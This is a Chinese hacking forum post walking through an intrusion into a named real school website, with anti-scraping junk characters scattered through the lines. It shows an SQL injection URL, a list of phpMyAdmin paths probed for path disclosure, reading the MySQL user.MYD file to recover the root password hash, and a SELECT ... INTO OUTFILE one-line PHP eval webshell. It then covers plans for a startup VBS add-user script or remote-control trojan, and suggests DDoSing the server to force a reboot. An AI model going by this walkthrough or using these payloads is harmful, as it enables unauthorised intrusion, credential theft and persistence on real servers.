第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
+ m( g& \" J1 i6 Y发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!! z# _; r* p) [3 C ~8 u
! ^; E/ [+ I, ^( t+ L
2 z: G% D' L) s4 A* T# \
' ^$ }& X5 u* h" a& M常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , z+ v4 x2 k; J3 P0 Z0 @$ E6 S
% |. z1 c m& h" [+ Q" R$ g+ }8 G2 S5 H那么想可以直接写入shell ,getshell有几个条件:/ n8 ?$ \% f5 k) M
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF + o6 x3 q- G6 E" H7 U* I; |
% z' W' B5 {: B# |5 p试着爆绝对路径:
O: F. a8 D8 ]( O; G1./phpMyAdmin/index.php?lang[]=1 / |; K2 y3 l7 r; e: |# V
2./phpMyAdmin/phpinfo.php
O, Q I2 ?. x3./load_file()
`5 c: e: Z$ F/ E. y4./phpmyadmin/themes/darkblue_orange/layout.inc.php
+ r. u! d/ c7 l$ `7 Z; q7 w5./phpmyadmin/libraries/select_lang.lib.php
2 ?' y2 b, g, [6./phpmyadmin/libraries/lect_lang.lib.php
8 M% J, t; |1 v. e- y7./phpmyadmin/libraries/mcrypt.lib.php
, {3 A" r- ]+ C* [+ n7 D \6 E8./phpmyadmin/libraries/export/xls.php 8 g: |( k' k0 n$ }4 e8 B; F
& h1 U% S& Z/ ~" h9 O; E) G均不行........................... ( v1 P: K; I9 G1 U: j& R& J
# ^& a0 F6 ~8 T9 {7 R0 @9 I御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
& W" H: G. S- ? Z1 y4 f! E
: C5 X, H4 |0 {5 X; p! Q6 C: I p权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 2 g* Q0 D0 c- o- N1 ~
; b: E$ e. [7 U# Q% Y6 ]; p
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
; E0 G2 E' m8 v! K7 d+ F3 k7 g8 z9 p6 A
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 6 w% y6 y$ R3 _) c% i2 g8 X
" t4 B: B: _- m( B) J8 N3 Y想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 1 p, \7 A% E$ G; m
: h7 S- s& U+ k/ W. n
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
+ {# N }- N: V+ B4 }' ^
4 P2 T. \" o& D! }' P自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ ^* h6 e4 }( F. J* s2 {1 e; @7 f; a! e4 N
成功读到root密码: % j% a9 r7 b; o4 w
* T5 I) |6 J3 r# [/ t) E17---- r(0072)
$ N3 O. t3 U( }* r18---- o(006f) 9 m4 L9 v0 x5 l2 T
19---- o(006f) 0 |4 h: t! V g3 h" H" H1 [. A
20---- t(0074) 6 D. ~4 Y/ O/ {* d; e
21---- *(002a) 3 c; J1 N( x) ^1 D
22---- 8(0038) ; I) I7 o& e, i( V
23---- 2(0032) 6 P+ O( i2 C. ?! C* m$ H
24---- E(0045)
0 d5 k6 h" q7 s5 b$ [# R3 T( K25---- 1(0031)
! `, ~5 b0 o3 ]9 X1 ~26---- C(0043)
3 A4 t+ N7 l& ]! x! y27---- 5(0035)
, p+ A V9 t7 {( i9 `9 h: y28---- 8(0038)
3 ?& s m4 ]# k# |. ~29---- 2(0032)
, ?4 ]; |$ |/ F30---- 8(0038)
( w% L( Z- |# Q31---- A(0041) - E. C; L$ l' K8 Q% N
32---- 9(0039) 6 W( d* G9 `5 P2 o' ]
33---- B(0042)
% K6 R1 I* s# L+ J \3 w9 H5 B34---- 5(0035) % B' Z/ B7 N7 d( @7 Z
35---- 4(0034) 0 @; ^7 U; k( N# K l% e4 A
36---- 8(0038) ~9 y5 m) m4 i
37---- 6(0036)
, Q. p, b' a/ |38---- 4(0034)
/ f7 x5 Y U# J39---- 9(0039)
( \( R1 V N, b9 u2 k1 C& [3 }40---- 1(0031) & ]4 d; z( T# M) m9 {+ @
41---- 1(0031) . f% Z2 n+ w% ~3 s
42---- 5(0035)
$ r' \2 u9 @: S1 s2 D43---- 3(0033) . ~7 ~, Z+ R0 I7 T- z
44---- 5(0035) 5 ~; j6 d$ W$ I% W
45---- 9(0039)
$ P4 I# G6 V! `* L46---- 8(0038)
8 ?0 \ @3 |. m1 E: B: c) f47---- F(0046) ) d8 F; p# Y; Q. G
48---- F(0046)
) A6 R. R% r3 h" m2 k49---- 4(0034) $ n& S2 l- [0 _, f9 t0 P
50---- F(0046) ^" R0 i# Y: f0 n' p+ H: W
51---- 0(0030)
( P7 C& Y& G l" D3 J52---- 3(0033)
" [* |( T0 M B53---- 2(0032)
q' N7 |/ e/ b' x) {* R& F5 @54---- A(0041)
. \1 J2 x3 {, H4 {2 g( V# ?55---- 4(0034)
# d. {+ ^ p: d' c; ?, x56---- A(0041)
0 b8 q0 {6 z. R57---- B(0042) + W% k3 l1 e9 E! U$ ?
58---- *(0044) ( P# ~0 s1 m9 F
59---- *(0035)
4 ?' J1 u i' J1 b60---- *(0041)
' N3 |& ?* m7 c61---- *0032) . l( J5 {, r. t$ F2 X. M
, }2 M% p+ W. @1 a
解密后成功登陆phpmyamin
, I6 ]; S# ?! i! e2 g! `1 H ! b Z! P7 }( @5 m4 p+ p* }
2 ^$ W" Y( q+ K( A5 s# s+ N7 n
# \; z- z8 B+ W' r2 L) v* d4 A) k5 u6 \% c6 i- \2 W
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ w3 \! F# j1 B0 F" F5 n5 g/ _# V% o+ z& Z# m" K6 h' x1 n! J
成功执行,拿下shell,菜刀连接: * I4 c* j6 H. ]
% O* F% c3 Z4 f2 K! L6 A
服务器不支持asp,aspx,php提权无果................... ' D5 |5 N: L. K& u- Q) i6 r+ `, E
( M; @' ~& M j3 }1 {
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ' @% `1 P% @- S m8 j
服务器上已经有个隐藏帐号了 . f" A: j. T2 `$ t
别名 administrators- t; S; l: U* L( c6 S
注释 管理员对计算机/域有不受限制的完全访问权
$ H2 n+ r8 Z- q- d成员 ( o8 }7 [$ ~# U, h! K
-------------------------------------------------------------------------------9 h! l R' n. r7 F k) a5 ~
admin
1 W/ i- {6 `1 g+ l3 Q7 q( q- VAdministrator2 n5 s' U- x9 K" Z2 |2 q2 I
slipper$) Z' _, ^) U/ |3 q/ F) [
sqluser, a1 D* p1 v! y! A
命令成功完成。 $ i% V3 h R# A6 _
- }1 y1 e2 s& d- b
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。4 O* S# R& \$ s. ]. ?7 Y% t n
& k4 L, T' O/ {7 Q
ddos服务器重启,不然就只能坐等服务器重启了...............................
0 o+ d, q- x( j; m+ l0 b5 e+ @
! a% U- N0 M5 o' { # u3 Y" m3 E9 f7 T; |% L
|